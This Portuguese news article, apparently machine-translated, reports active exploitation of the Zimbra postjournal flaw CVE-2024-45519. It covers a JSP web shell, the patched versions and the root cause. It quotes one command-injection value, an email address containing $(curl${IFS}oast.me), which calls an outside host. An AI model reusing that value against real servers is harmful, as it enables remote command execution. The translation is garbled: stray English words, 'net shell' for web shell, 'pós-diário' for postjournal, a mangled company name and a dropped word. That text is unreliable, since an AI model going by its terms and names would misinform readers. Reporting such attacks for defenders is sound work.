Pesquisadores de segurança cibernética estão alertando sobre tentativas ativas de exploração visando uma falha de segurança recentemente divulgada na Colaboração Zimbra da Synacor.
A empresa de segurança empresarial Proofpoint disse que começou a observar a atividade a partir de 28 de setembro de 2024. Os ataques buscam explorar CVE-2024-45519, uma grave falha de segurança no serviço pós-diário do Zimbra que pode permitir que invasores não autenticados executem comandos arbitrários nas instalações afetadas.
“Os e-mails falsificando o Gmail foram enviados para endereços falsos nos campos CC, na tentativa de os servidores Zimbra analisá-los e executá-los como comandos”, disse Proofpoint em uma série de postagens no X. “Os endereços continham strings Base64 que são executadas com o utilidade.”
O problema crítico foi resolvido pelo Zimbra nas versões 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9 e 10.1.1 lançadas em 4 de setembro de 2024. Um pesquisador de segurança chamado lebr0nli (Alan Li) foi creditado pela descoberta e relatando a deficiência.
“Embora o recurso pós-diário possa ser opcional ou não habilitado na maioria dos sistemas, ainda é necessário aplicar o patch fornecido para evitar exploração potencial”, observou Ashish Kataria, engenheiro arquiteto de segurança da Synacor, em um comentário em 19 de setembro de 2024.
“Para sistemas Zimbra onde o recurso postjournal não está habilitado e o patch não pode ser aplicado imediatamente, a remoção do binário postjournal pode ser considerada uma medida temporária até que o patch possa ser aplicado.”
A Proofpoint disse que identificou uma série de endereços CC que, quando decodificados, tentam escrever um net shell em um servidor Zimbra vulnerável no native: “/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp.”
O net shell instalado posteriormente escuta a conexão de entrada com um campo de cookie JSESSIONID pré-determinado e, se presente, prossegue analisando o cookie JACTION para comandos Base64.
O net shell vem equipado com suporte para execução de comandos through exec. Alternativamente, ele também pode baixar e executar um arquivo através de uma conexão de soquete. Os ataques não foram atribuídos a um ator ou grupo de ameaça conhecido no momento da redação deste artigo.
Dito isto, a atividade de exploração parece ter começado um dia depois que o Challenge Discovery divulgou detalhes técnicos da falha, que dizia que ela “decorre da entrada não higienizada do usuário sendo passada para popen na versão não corrigida, permitindo que os invasores injetem comandos arbitrários”.
A empresa de segurança cibernética disse que o problema está enraizado na maneira como o binário pós-diário baseado em C manipula e analisa endereços de e-mail de destinatários em uma função chamada “msg_handler ()”, permitindo assim a injeção de comando no serviço executado na porta 10027 ao passar um SMTP especialmente criado. mensagem com um endereço falso (por exemplo, “aabbb$(curl${IFS}oast.me)”@mail.area.com).
À luz das tentativas ativas de exploração, é altamente recomendável que os usuários apliquem os patches mais recentes para proteção ideally suited contra ameaças potenciais.
